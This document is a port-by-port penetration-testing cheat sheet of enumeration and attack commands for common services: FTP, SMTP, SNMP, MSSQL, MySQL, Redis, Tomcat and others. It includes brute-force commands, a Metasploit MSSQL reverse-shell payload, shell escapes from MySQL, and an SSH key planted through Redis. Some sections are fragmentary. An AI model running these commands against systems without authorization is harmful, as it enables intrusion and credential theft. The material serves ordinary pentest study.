Many FTP servers allow anonymous users and might be misconfigured and give too much access. Always try to login as an anonymous user (anonymous:anonymous). It is also important to remember the binary and ascii mode. If you upload a binary file you to put the server in binary mode typing binary and the same with text-files, typing ascii.
Telnet is considered insecure mainly because it does not encrypt its traffic. Also a quick search in exploit-db will show that there are various RCE vulnerabilities on different versions that might be worth checking out.
SMTP is a server to server service. The user receives or sends emails using IMAP or POP3. Those messages are then routed to the SMTP-server which communicates the email to another server. The SMTP-server has a database with all emails that can receive or send emails. We can use SMTP to query that database for possible email addresses. Notice that we cannot retrieve any emails from SMTP. We can only send emails.
Connect to SMTP:
nc $ip 25
telnet $ip 25
Possible commands to use after connection:
HELO -
EHLO - Extended SMTP.
STARTTLS - SMTP communicted over unencrypted protocol. By starting TLS-session we encrypt the traffic.
RCPT - Address of the recipient.
DATA - Starts the transfer of the message contents.
RSET - Used to abort the current email transaction.
MAIL - Specifies the email address of the sender.
QUIT - Closes the connection.
HELP - Asks for the help screen.
AUTH - Used to authenticate the client to the server.
VRFY - Asks the server to verify is the email user's mailbox exists.
telnet $ip 25
EHLO root
MAIL <FROM:root@target.com>
RCPT <TO:example@gmail.com>
DATA
Subject: Testing open mail relay.
Testing SMTP open mail relay. Have a nice day.
.
QUIT
53 - DNS
Find name servers
host -t ns microsoft.com
Find email servers
host -t mx microsoft.com
Subdomain bruteforcing
for ip in $(cat list.txt); do host $ip.microsoft.com; done
Reverse dns lookup bruteforcing
for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found"
hydra -l user -P /usr/share/wordlists/rockyou.txt -f $ip http-get /path
88 - Kerberos
Kerberos is a protocol that is used for network authentication. Different versions are used by *nix and Windows. But if you see a machine with port 88 open you can be fairly certain that it is a Windows Domain Controller.
Memory password extraction (pass the ticket attacks): Mimikatz
110 - POP3
This service is used for fetching emails on a email server. If the server has this port open then probably it is an email server and other clients on the network access it to fetch their emails.
If you find usernames and passwords for email accounts you can check the mail using Telnet:
telnet $ip 110
+OK beta POP3 server (JAMES POP3 Server 2.3.2) ready
USER billydean
+OK
PASS password
+OK Welcome billydean
list
+OK 2 1807
1 786
2 1021
retr 1
+OK Message follows
From: jamesbrown@motown.com
Dear Billy Dean,
Here is your login for remote desktop ... try not to forget it this time!
username: billydean
password: PA$$W0RD!Z
111 - Rpc
Rpcbind can help us look for NFS-shares. So look out for nfs. Obtain list of services running with RPC:
rpcbind -p 192.168.1.101
Connect to an RPC share without a username and password and enumerate privileges:
rpcclient --user="" --command=enumprivs -N $ip
Connect to an RPC share with a username and enumerate privledges:
Full enumeration and vulnerability scan without brute force and dos:
nmap -p139,445 -T4 -oN smb_vulns.txt -Pn --script 'not brute and not dos and smb-*' -vv -d $ip
All smb scripts authenticated scan:
nmap -sV -Pn -vv -p 445 --script-args smbuser=<username>,smbpass=<password> --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip
SNMP is a network protocol used for collection, organizing and exchanging information between network devices. It runs on managed switches, routers, and server OSs for monitoring purposes. SNMP is accesed upon providing a valid community string within a UDP datagram to port 161. It is usually public. Within SNMP you can see running processes, open ports, users, windows version, installed software, etc.
Fix SNMP output values so they are human readable:
for community in public private manager; do snmpwalk -c $community -v1 $ip; done
for community in public private manager; do snmpwalk -c $community -v1 $ip; done
snmpenum $ip public windows.txt
Less noisy:
snmpwalk -c public -v1 $ip 1.3.6.1.4.1.77.1.2.25
Based on UDP, stateless and susceptible to UDP spoofing:
nmap -sU --open -p 16110.1.1.1-254 -oG out.txt
snmpwalk -c public -v1 10.1.1.1 # we need to know that there is a community called public
snmpwalk -c public -v 2c 10.1.1.1 # version 2
snmpwalk -c public -v1 192.168.11.204 1.3.6.1.4.1.77.1.2.25 # enumerate windows users
snmpwalk 5c public 5v1 192.168.11.204 1.3.6.1.2.1.25.4.2.1.2 # enumerates running processes
nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes $ip
snmp-check -t $ip -c public
SNMPv3 Enumeration:
nmap -sV -p 161 --script=snmp-info $ip/24
Automate the username enumeration process for SNMPv3:
msf > use auxiliary/scanner/snmp/cisco_config_tftp
Scanning using metasploit:
msf > use auxiliary/scanner/snmp/snmp_login
389/636 - LDAP
This port is usually used for Directories. Ldap directory can be understood a bit like the windows registry or a database-tree, since directory here means more like a telephone-list than a folder. Ldap is usually used to store user infomration in corporate structures. Web apps can use ldap for authentication which means you can perform ldap-injections.
Sometimes you can access ldap using an anonymous login and find some valuable data about users.
Encrypted version of the HTTP protocol. Always check for SSL vulnerabilites such as heartbleed.
OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable
OpenSSL 1.0.1g is NOT vulnerable
OpenSSL 1.0.0 branch is NOT vulnerable
OpenSSL 0.9.8 branch is NOT vulnerable
First we need to investigate if the https-page is vulnerable to heartbleed:
sudo sslscan $ip:443
nmap -sV --script=ssl-heartbleed 192.168.101.8
Open a connection
openssl s_client -connect $ip:443
Basic SSL ciphers check:
nmap --script ssl-enum-ciphers -p 443 $ip
Exploiting with metasploit:
msf > use auxiliary/scanner/ssl/openssl_heartbleed
Notes:
Look for unsafe ciphers such as Triple-DES and Blowfish
443 - TLS
Transport Layer Security, or TLS, is a widely adopted security protocol designed to facilitate privacy and data security for communications over the Internet. A primary use case of TLS is encrypting the communication between web applications and servers, such as web browsers loading a website. TLS evolved from SSL.
Enumerating supported protocols and cipher suites:
python prober.py $ip
Enumerating supported features and extensions:
nmap --script ssl-enum-ciphers -p443
Certificate review:
nmap -p443 --script ssl-cert
You should validate that:
The X.509 subject common name (CN) is correct for the service
The issuer is reputable and certificate chain valid
RSA or DSA public key values are longer than 2,048 bits
DH public parameters are longer than 2,048 bits
The certificate is valid and has not expired
The certificate is signed using SHA-256
Vulnerabilites:
POODLE against CBC mode ciphers within SSL 3.0
BEAST against CBC mode ciphers via TLS 1.0
Byte biases in RC4 ciphers across all SSL and TLS protocol versions
Validate if the key was generated with weak entropy:
IPsec tries to solve the confidentiality/integrity problems of the IP protocol. It provides HMAC of the origin and encrypts data.
You can find hosts supporting ipsec with:
ike-scan -q $iprange
Validate the follow:
DH group can be insecure, allowing passive decryption.
Preshared key (PSK) might be cracked.
Obtaining the XAUTH once the PSK is known.
For more info, refer to:
587 - Submission
Outgoing smtp-port
631 - Cups
You authenticate with the OS-users.
There are vulnerabilities for it so check your searchsploit.
1433 - MsSQL
Default port for Microsoft SQL database.
Enumerate MSSQL Servers on the network:
msf > use auxiliary/scanner/mssql/mssql_ping
nmap -sU --script=ms-sql-info $ip
Bruteforce MsSql with metasploit:
msf > use auxiliary/scanner/mssql/mssql_login
Gain shell using gathered credentials with metasploit:
msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
Log in to a MsSql server:
root@kali:~/dirsearch# cat ../.freetds.conf
[someserver]
host = $ip
port = 1433
tds version = 8.0
user=sa
root@kali:~/dirsearch# sqsh -S someserver -U sa -P PASS -D DB_NAME
1521 - Oracle DB
Enumeration:
tnscmd10g version -h $ip
tnscmd10g status -h $ip
Bruteforce the ISD with metasploit:
msf > use auxiliary/scanner/oracle/sid_brute
Connect to the database with sqlplus
1723 - PPTP
Point-to-Point Tunneling Protocol provides remote access to mobile devices, uses TCP port 1723 for key exchange and IP protocol 47 (GRE) to encrypt data between peers.
Enumeration:
nmap –Pn -sSV -p1723 $ip
Bruteforce:
cat dic.txt | thc-pptp-bruter –u admin $ip
2049 - NFS
Network file system This is a service used so that people can access certain parts of a remote filesystem. If this is badly configured it could mean that you grant excessive access to users.
Show Mountable NFS Shares:
nmap -sV --script=nfs-showmount $ip
Show all mounts:
showmount -e $ip
Mount a NFS share
mount $ip:/vol/share /mnt/nfs
2100 - Oracle XML DB
There are some exploits for this, so it is useful to check it out. You can use the default Oracle users to access to it. You can use the normal ftp protocol to access it.
Some default passwords here:
Default logins → sys:sys / scott:tiger
3306 - MySQL
Nmap scan:
nmap -sV -Pn -vv -script=mysql* $ip -p 3306
Vulnerability scan:
sqlmap -u '<http://$ip/login-off.asp>' --method POST --data 'txtLoginID=admin&txtPassword=aa&cmdSubmit=Login' --all --dump-all
If Mysql is running as root and you have acces, you can run commands:
mysql> select do_system('id');
mysql> \\! sh
Always test the following:
username: root
password: root
mysql --host=$ip -u root -p
mysql -h <Hostname> -u root
mysql -h <Hostname> -u root@localhost
mysql -h <Hostname> -u ""@localhost
telnet $ip 3306
Configuration files:
cat /etc/my.cnf
MySQL commands cheat sheet:
If with a shell, find login credentials for the database:
/var/www/html/configuration.php
<?php
class JConfig {
var $mailfrom = 'admin@rainng.com';
var $fromname = 'testuser';
var $sendmail = '/usr/sbin/sendmail';
var $password = 'myPassowrd1234';
var $sitename = 'test';
var $MetaDesc = 'Joomla! - the dynamic portal engine and content management system';
var $MetaKeys = 'joomla, Joomla';
var $offline_message = 'This site is down for maintenance. Please check back again soon.';
}
3389 - RDP
This is a proprietary protocol developed by windows to allow remote desktop.
VNC is run as a specific user, so when you use VNC it assumes that user
If you have dumped and cracked the user password on a machine does not mean you can use them to log in
To find the VNC password you can use the metasploit/meterpreter post exploit module that dumps VNC passwords
Scan for logins using metasploit:
msf > use auxiliary/scanner/vnc/vnc_login
Scan for no-auth:
msf > use auxiliary/scanner/vnc/vnc_none_auth
Meterpreter post exploitation module:
background
use post/windows/gather/credentials/vnc
set session X
exploit
5985 - WinRM
This is the Windows Remote Management tool. It allows remote management, meaning that any server that has this service allows us to connect to it if you have credentials and permissions to use it.
Once that's done, we need to copy the uploaded key into the .ssh folder; first, we check the current folder with this:
config get dir
Now we change our directory to /root/.ssh/:
config set dir /root/.ssh/
Next, we change the name of our file using config set dbfilename "authorized_keys" and save using save.
Now we try to ssh into the machine:
ssh -i id_rsa username@$ip
8080 - Tomcat (one of the most common)
Tomcat suffers from default passwords. There is even a module in metasploit that enumerates common tomcat passwords. And another module for exploiting it and giving you a shell.
Tests whether a directory traversal vulnerability is present in versions of Apache Tomcat 4.1.0 - 4.1.37, 5.5.0 - 5.5.26 and 6.0.0 - 6.0.16 under specific and non-default installations:
msf > use auxiliary/admin/http/tomcat_utf8_traversal
msf auxiliary(tomcat_utf8_traversal) > show actions
...actions...
msf auxiliary(tomcat_utf8_traversal) > set ACTION < action-name >
msf auxiliary(tomcat_utf8_traversal) > show options
...show and set options...
msf auxiliary(tomcat_utf8_traversal) > run
Enumerating Apache Tomcat's usernames via malformed requests to j_security_check, which can be found in the web administration package. It should work against Tomcat servers 4.1.0 - 4.1.39, 5.5.0 - 5.5.27, and 6.0.0 - 6.0.18:
msf > use auxiliary/scanner/http/tomcat_enum
msf auxiliary(tomcat_enum) > show actions
...actions...
msf auxiliary(tomcat_enum) > set ACTION < action-name >
msf auxiliary(tomcat_enum) > show options
...show and set options...
msf auxiliary(tomcat_enum) > run
Login to a Tomcat Application Manager instance using a specific user/pass:
msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > show actions
...actions...
msf auxiliary(tomcat_mgr_login) > set ACTION < action-name >
msf auxiliary(tomcat_mgr_login) > show options
...show and set options...
msf auxiliary(tomcat_mgr_login) > run
8080 - WebDav
Test:
davtest -move -sendbd auto -url http://:8080$ip/webdav/
A very complete tool for SSL auditing is , finds BEAST, FREAK, POODLE, heart bleed, etc...
If Postfix is run on it it could be vunerable to shellshock:
Common UNIX Printing System has become the standard for sharing printers on a linux-network. You will often see port 631 open in your priv-esc enumeration when you run netstat. You can log in to it here:
Find version. Test cups-config --version. If this does not work surf to and see the CUPS version in the title bar of your browser.
